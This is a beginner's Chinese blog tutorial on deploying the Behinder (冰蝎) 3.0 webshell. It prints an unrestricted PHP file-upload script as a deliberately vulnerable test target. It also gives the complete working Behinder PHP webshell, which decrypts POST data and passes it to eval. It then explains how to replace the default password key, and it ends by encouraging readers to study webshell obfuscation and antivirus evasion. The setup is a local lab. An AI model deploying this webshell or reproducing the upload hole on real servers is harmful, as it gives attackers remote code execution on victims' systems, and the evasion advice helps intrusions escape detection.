冰蝎3.0的使用方法与默认密码更改方法

最新推荐文章于 2024-05-29 14:55:54 发布
最新推荐文章于 2024-05-29 14:55:54 发布
阅读量10w+ 收藏 45
点赞数 15
分类专栏: 渗透测试基础知识 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/107916317
版权

前言

今天刚下载了最新版的冰蝎3.0 beta2,但是一直连不上,后来问了公司的大哥才知道了原因,这里做一个记录,希望对你有所帮助。

这篇文章比较基础,主要面向新手,技术含量较低主要为操作流程。

首先看看下载后有什么文件:
在这里插入图片描述
server文件中放的是各种语言的webshell,如下图:
在这里插入图片描述

环境配置

这里我使用的php的webshell做的实验。首先我开了一个windows的虚拟机,下载了phpstudy,开启了apache,然后写一个文件上传的php代码,这里采用的是菜鸟教程上自带的php文件上传代码,具体代码如下:


<!-- index.html代码 -->

<html>
<head>
<meta charset="utf-8">
<title>Upload</title>
</head>
<body>
<!-- 下面表单表示将接收到底文件传给upload_file.php去处理 -->
<form action="upload_file.php" method="post" enctype="multipart/form-data"> 
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>

</body>
</html>

// upload_file.php
<?php 
if ($_FILES["file"]["error"] > 0)
{
    echo "错误:" . $_FILES["file"]["error"] . "<br>";
}
else
{
    echo "上传文件名: " . $_FILES["file"]["name"] . "<br>";
    echo "文件类型: " . $_FILES["file"]["type"] . "<br>";
    echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
    echo "文件临时存储的位置: " . $_FILES["file"]["tmp_name"];
}
move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
echo "文件存储在: " . "upload/" . $_FILES["file"]["name"] //文件会被上传到当前目录下的upload文件夹中
?>

将上诉代码放在:
在这里插入图片描述
只要下载了phpstudy应该就会有这个文件夹,我使用的是默认目录安装的,upload_file.php代码写到上传的文件需要被放在当前目录下的upload文件夹中,因此我们需要自己创建一个upload文件夹,如上图所示。

连接webshell

在这里插入图片描述
上传页面如上图所示,点击chose file选中文件,点击提交上传我们的php的webshell即可,上传成功这会出现下图。
在这里插入图片描述

这时候双击打开我们的冰蝎:
在这里插入图片描述
如果无法打开可能是java版本不对,这里我给出自己的java版本作为参考。
在这里插入图片描述

打开后如下图所示:
在这里插入图片描述
在空白处右键然后点击新增:
在这里插入图片描述
输入url跟密码然后点击保存在这里插入图片描述

这里面说一下为什么默认密码为什么是rebeyond还有怎样更改默认密码:
先看看冰蝎的phpshell的源代码:

<?php
@error_reporting(0);
session_start();

if ($_SERVER['REQUEST_METHOD'] === 'POST')
{
    $key="e45e329feb5d925b"; //这一行为密码的md5的前16位
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
}
?>

跟我在代码中标注的一样

$key=“e45e329feb5d925b”; //这一行为密码的md5的前16位
我们去cmd5这个网站中去进行加解密操作,输入rebeyond:
在这里插入图片描述
发现rebeyond的32位md5的前16为刚好就是代码中的key的值(是第一行md5(rebeyond,32))。现在大家应该知道怎么改密码了吧,只要用你想用的密码的md5的前16位代替代码中key的值,然后你就可以使用自己的密码登陆shell了。例如你想使用admin当密码,你求出的admin的md5如下:
在这里插入图片描述
这时候你只需要将代码中的 “ $key=“e45e329feb5d925b”; “ 中key的值改为21232f297a57a5a7即可使用admin为密码登陆,说到这里就已经很详细了,点到为止。

冰蝎页面

连接成功后页面如下:
在这里插入图片描述
大家可以根据自己的需要去使用,不过建议大家有机会研究一下webshell的混淆与免杀,否则很容易被查杀。

Shanfenglan7
关注
  • 15
    点赞
  • 45
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 15
    评论
专栏目录
网络安全工具冰蝎(behinder)3.0使用教程
SHELLCODE_8BIT的博客
09-13 3242
输入我们上传的地址,之后密码填写rebeyond。我的是java所以选择shell.jsp。将server中的文件上传。
openssl 版本区别_冰蝎的前世今生:3.0新版本下的一些防护思考
weixin_39641103的博客
11-27 913
冰蝎(Behinder)是国内黑客圈较火的一款Webshell管理工具。在今年HW开始前,冰蝎突然进行了3.0版本的发布,新版本修改了不少旧版本的流量特征,导致大量WAF、HIDS、Webshell检测工具失效。本文将详细揭秘冰蝎的前世今生,以及对于冰蝎相关攻击的检测思路和3.0新版本下的防护思考。冰蝎的前世在冰蝎这个工具出现以前,中国菜刀一直是国内的白帽子、黑帽子、各种帽子常用的Webshell...
冰蝎v3.0-beta7
08-31
冰蝎3.0
冰蝎的原理与安装使用(1),讲的太透彻了
2401_83739411的博客
04-16 771
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。而老牌的如中国菜刀因为其流量特征太过明显,从而使用的场景越来越少。不过在此还是要致敬前辈的贡献。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
打点神器behinder(冰蝎使用教程-踩坑版
最新发布
weixin_69925635的博客
05-29 299
使用命令java -jar Behinder.jar启动后如果java版本过高会报错缺少javafx,但在高版本java环境下安装会有点麻烦,所以安装一个jdk1.8进行替换更好。lhost设置为kali的ip,端口9527,并将这些信息也填在刚刚behinder建立的连接中。点击给我连,msf中exploit该漏洞,可以看到成功反弹shell。在msf中有这个漏洞,因此可以利用msf和behinder联动。将该文件利用靶机dvwa文件上传的漏洞进行上传。在攻击机上安装kali,安装完成后如下图所示。
冰蝎3.0流量包简单分析
道路且长 行则将至
03-08 963
思路 工具编写思路 配合系统tshark将冰蝎的POST流量进行导出, 对shell文件进行url解码和base解码,得到aes的key密钥 再使用key对数据进行解密,值得关注的是数据转换的格式很有趣,转为utf-8则乱码 现阶段困难点 由于无法过滤出原始的数据流导致无法最终服务器回显的数据 本来是想写成自动化的,有时间的话后期应该会完善
斗象PRS-NTA&大圣云沙箱全面支持检测冰蝎3.0 Beta7
m0_61869253的博客
09-13 179
斗象科技能力中心团队已在第一时间对冰蝎Behinder_v3.0 Beta 7进行流量分析、特征检测。目前,斗象智能安全PRS-NTA产品或大圣云沙箱均可准确识别冰蝎v3.0 Beta 7及其变形的webshell。
冰蝎3.0使用方法密码修改及对应java环境安装
Alex_mjk的博客
07-14 5426
参考文章:https://blog.csdn.net/qq_41874930/article/details/107916317 https://www.cnblogs.com/IT-Ramon/p/12017387.html 一、java环境安装 下载地址:https://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html 下图为修改jdk安装路径 安装完...
冰蝎2.0-密码123qaz.rar
10-17
冰蝎webshell,无毒,无后门,安全学习可放心使用,技术含量较低主要简单操作。为防止杀毒软件误杀,已设置密码123qaz
冰蝎3.0(Behinder.jar)无法打开
m0_53623841的博客
02-12 477
可能是冰蝎beta7版本客户端不再内置javafx库,java11以后版本移除了JavaFX库,要运行冰蝎需要自己下载JavaFX库。在冰蝎中新建一个start.txt,写入下面的代码,双引号中写入自己刚刚下载的lib文件夹的路径。时光从来都不会为任何一个人停留脚步,我们要珍惜这短暂而美好的时光。应该是缺了javafx,直接下载就行。双击start.bat,即可打开冰蝎。保存,并且将后缀bat。
冰蝎-2.0.1(解压密码:111)
08-23
###2019.2.15 v2.0.1 t00ls专版 更新日志 1.修复了PHP 5.3.0之前版本提示JSON错误的问题。 ###2019.2.9 v2.0 t00ls专版 更新日志 1.增强了PHP的兼容性,PHP 5.2~PHP 7.2.15全版本支持,加密方式根据服务器端支持情况动态选择,不再依赖openssl扩展。 2.虚拟终端命令执行结果增加了右键复制功能。 3.数据库查询结果可复制(单个单元格、单行),可导出SQL查询结果。 4.增加了自定义请求头的功能,可自定义cookie等。 5.增加了HTTP代理连接功能。 6.通过虚拟终端启动的shell进程可关闭,避免服务器侧残留shell进程。 7.增加了简单的asp支持。 8.增加了服务器端输出容错功能,服务器端前后可插入混淆字符串,如gif文件头等。 9.修复了某些php环境下报always_populate_raw_post_data 错误。 10.修复了PHP 7环境下虚拟终端无法打开的问题。 11.修复了一些其他的bug。
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
webshell连接工具冰蝎2.0,后面有三点零的,找一找再发
12-28
做渗透的,不支持恶意攻击
jQuery 3.0 的变化及使用方法
10-22
jQuery ,是迄今为止世界上最流行的 JavaScript 库,一直是我们这些 Web 开发者的神器。自从它在 2006 年发布最初版本直到如今,已经有非常多的 Web 开发者在项目中引入了这个优秀的库来使开发工作变得更轻松
asp.net core 3.0使用swagger的方法与问题
01-21
上次更新了 asp.net core 3.0 简单的记录了一下 swagger 的使用,那个项目的 api 比较简单,都是匿名接口不涉及到认证以及 api 版本控制,最近把另外一个 api 项目升级到了 3.0,还是遇到了一些问题,这里单独写一篇...
android事件总线EventBus3.0使用方法详解
08-28
Android 事件总线 EventBus 3.0 使用方法详解 EventBus 3.0 是一个 Android 事件总线库,提供了一个灵活的事件处理机制,允许在应用程序中发布和订阅事件。下面将详细介绍 EventBus 3.0使用方法和原理。 ...
网站控制工具:冰蝎3.0使用体验
jklbnm12的博客
04-25 3431
这篇文章比较基础,主要面向新手,技术含量较低主要为操作流程。 0x01. 冰蝎是什么 利用动态二进制加密实现新型一句话木马的客户端 , 相对于菜刀和蚁剑他的数据是加密传输的 1.1 下载 github地址: https://github.com/rebeyond/Behinder/releases 下载后的文件 server文件中放的是各种语言的webshell,如下图: Behinder_v3.0_Beta6_win.jar是客户端 , 双击就能打开 , 但是要有java环境 , 下图是我的ja
冰蝎简单使用
00勇士王子的博客
04-29 1万+
冰蝎介绍   Webshell管理工具,动态二进制加密网站客户端。流量动态加密,攻击特征安全设备(WAF、WebIDS)难以检测。   冰蝎通信过程中使用AES(高级加密算法,对称加密,微信小程序使用此种方法)进行加密,Java和.NET默认支持AES,php中需要开启openssl扩展,在V2.0版本后,php环境方式根据服务端支持情况动态选择,使得冰蝎更强大。 常规使用   因为是自己练习,所以直接用phpstudy在本地上传一个shell。   冰蝎安装目录下有官方自带的几个shell 我将shell
冰蝎使用
热门推荐
bring_coco的博客
03-03 1万+
一.启动 Windows环境下: 1.配置环境:冰蝎只支持jre6-jre8 可以在电脑上查看java版本 命令:java -version 2.启动 在冰蝎目录下命令行输入 命令:java -jar Behinder_v3.0_Beta6_win.jar(这里文件名可简化) 即可开启 Linux环境下: 注意切换jdk版本6-8,对应javac版本也要和java版本相同,同理打开冰蝎目录输入命令 二.使用(在本机进行实测) 环境:phpStudy+冰蝎 通过启动phpStudy,访问本机地址 成功访
冰蝎3.0 jar打不开
07-06
### 回答1: 冰蝎3.0是一款网络安全工具,用于进行渗透测试和网络攻防实验。如果遇到冰蝎3.0的jar文件无法打开,可能是由于以下几个原因: 首先,确保你的电脑上已经安装了Java运行环境(JRE)。冰蝎3.0使用Java编写,所以需要Java运行环境才能正常运行。你可以去官方网站下载并安装最新的Java运行环境。 其次,检查一下你下载的冰蝎3.0 jar文件是否完整和正确。有时候,下载过程中可能会出现网络中断或者文件损坏的情况,导致文件无法正常打开。你可以尝试重新下载一次,确保文件完整。 另外,你还可以尝试使用命令行来打开冰蝎3.0 jar文件。打开命令提示符(Windows系统可以使用Win+R快捷键打开运行窗口,输入"cmd"并回车),在命令行中定位到jar文件所在的路径,然后运行以下命令:java -jar 冰蝎3.0.jar。这样就可以尝试以命令行方式打开冰蝎3.0。 如果以上方法都无法解决问题,你可以尝试联系冰蝎3.0的开发者或者官方客服寻求帮助。他们可能会提供一些针对性的解决方案或者修复版本。 总结来说,如果冰蝎3.0 jar无法打开,你可以检查是否安装了Java运行环境、重新下载jar文件、尝试使用命令行打开,或者寻求官方的帮助。希望以上方法对解决问题有所帮助。 ### 回答2: 冰蝎3.0是一个流行的网络安全工具,用于渗透测试和漏洞利用。如果冰蝎3.0的jar文件无法打开,可能有以下几个原因和解决方法: 1. Java环境问题:冰蝎3.0是基于Java的工具,因此确保您已经正确安装了Java运行环境(JRE)。您可以通过在命令行中输入“java -version”来检查Java的安装情况。如果尚未安装,请下载并安装最新版本的Java。 2. 文件损坏:如果冰蝎3.0的jar文件受损,可能无法打开。请尝试重新下载冰蝎3.0的jar文件,并确保下载的文件完整且未被损坏。您还可以尝试将该文件复制到另一个位置,然后再次尝试打开。 3. 安全软件干扰:有些杀毒软件或防火墙可能会将冰蝎3.0的jar文件识别为潜在的安全威胁并阻止其打开。您可以尝试禁用或暂时关闭安全软件,然后再次尝试打开文件。 4. 命令行执行问题:冰蝎3.0通常在命令行中使用。请确保您正确使用Java命令来执行冰蝎3.0的jar文件。在命令行中导航到jar文件所在的目录,并输入“java -jar 文件名.jar”来尝试打开文件。 如果上述方法都无法解决问题,可能是由于其他原因导致无法打开冰蝎3.0的jar文件。您可以尝试在相关的安全论坛或开发者社区中寻求帮助,以获得更详细的技术支持。
评论 15
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值